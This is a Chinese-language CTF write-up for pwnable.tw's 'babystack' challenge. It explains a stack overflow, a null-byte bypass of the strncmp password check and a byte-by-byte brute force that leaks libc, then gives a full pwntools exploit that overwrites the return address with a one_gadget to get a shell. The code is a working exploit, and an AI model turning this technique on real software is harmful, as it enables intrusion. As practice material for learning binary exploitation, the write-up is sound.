By

Contents
  1. 1. babystack
    1. 1.1. exp

babystack

1
2
3
4
5
6
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled

copy时存在栈溢出

首先是strlen函数用来计算指定的字符串s 的长度,不包括结束字符”\0”

strncmp函数是指定比较size个字符,strcmp函数比较整个字符,直到出现不同的字符或遇”\0”为止

所以可以通过00截断比较,利用login比较,也可以逐字节进行爆破。这时候考虑有没有函数地址可以爆破泄露…

copy之后,栈中有libc地址了,爆破得到libc基址

但是我不知道怎么把这个地址前面的\x00去掉…或者是我理解有问题ovo???

去看了看网上的..调试看和我的一样子,服务器的…太慢了…没法试qaq(以后再说😤

(哦…过了俩月换了个虚拟机,又好了,在 1\naaaaaa 后就有地址了…)

因为栈空间没有进行初始化,且login copy栈空间重叠,利用这里覆盖返回地址为one_gadget。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!usr/bin/python
from pwn import *
import os
context.log_level = 'debug'

binary = "./babystack"
ip = "chall.pwnable.tw"
port = 10205
elf = ELF(binary)

def login(passwd):
	io.sendlineafter(">> ", "1")
	io.sendafter("passowrd :", passwd)
	return io.recvuntil("\n")
	
def logout():
	io.sendlineafter(">> ", "1")
	
def copy(copy):
	io.sendlineafter(">> ", "3")
	io.sendafter("Copy :", copy)

def ex():
	io.sendlineafter(">> ", "2")

def buf(length, cover):
	for i in range(length):
		for q in range(1,256):
			if 'Login' in login(cover+chr(q)+'\n'):
				cover+=chr(q)
				logout()
				break
	return cover

def pwn(ip, port, debug):
	global io
	if debug == 1:
		io = process(binary)
		libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")	
		# gdb.attach(io, "b*0x08048819")
		one = [0x45226, 0x4527a, 0xf0364, 0xf1207]
	else:
		io = remote(ip, port)
		libc = ELF("libc_64.so.6")
		one = [0xef6c4, 0x45216, 0x4526a, 0xf0567]
	guess = buf(0x10, "")
	login('\x00'+'a'*0x57)
	copy('a'*0x40)
	logout()
	# 0x7ffb87ac0000---0x7ffb87b2ffc4 <__GI__IO_setvbuf+324>
	libc_base=u64(buf(6,"a"*0x10+'1\n'+'a'*6)[0x18:].ljust(8, '\x00'))-324-0x4F730-libc.symbols['__libc_start_main']
	one_gadget = libc_base + one[3]
	
	payload='\x00'+'a'*0x3f+guess+'a'*0x18+p64(one_gadget)
	login(payload)
	copy('a' * 0x10)
	ex()
	
	success("libc_base = "+hex(libc_base))
	io.interactive()
	

if __name__ == '__main__':
	pwn(ip, port, 0)


'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xef6c4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf0567 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''